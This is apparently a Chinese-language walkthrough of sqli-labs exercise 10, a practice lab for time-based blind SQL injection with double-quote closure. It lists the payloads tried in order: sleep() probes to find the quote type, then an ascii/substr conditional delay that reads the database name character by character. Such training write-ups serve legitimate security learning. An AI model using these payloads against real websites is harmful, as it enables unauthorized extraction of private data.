当前位置: 代码迷 >> 综合 >> sqli-labs练习(十)--- GET-Blind-Time based-double quotes
  详细解决方案

sqli-labs练习(十)--- GET-Blind-Time based-double quotes

热度:40   发布时间:2023-09-23 00:45:55.0

sqli-labs练习(十)--- GET-Blind-Time based-double quotes

payload:id=1
sqli-labs练习(十)--- GET-Blind-Time based-double quotes

通过几次尝试,可以发现,这是一个基于时间的盲注,
payload:id=1' and sleep(5)%23,时间并没有延迟5秒,说明不是单引号的闭合
sqli-labs练习(十)--- GET-Blind-Time based-double quotes

payload:id=1" and sleep(5)%23,页面发生延迟,说明是双引号的闭合
sqli-labs练习(十)--- GET-Blind-Time based-double quotes

payload:id=1" and if(ascii(substr(database(),1,1))=115,sleep(5),null)%23,(tip:小写字母s的ascii码值是115)页面发生延迟
sqli-labs练习(十)--- GET-Blind-Time based-double quotes

  相关解决方案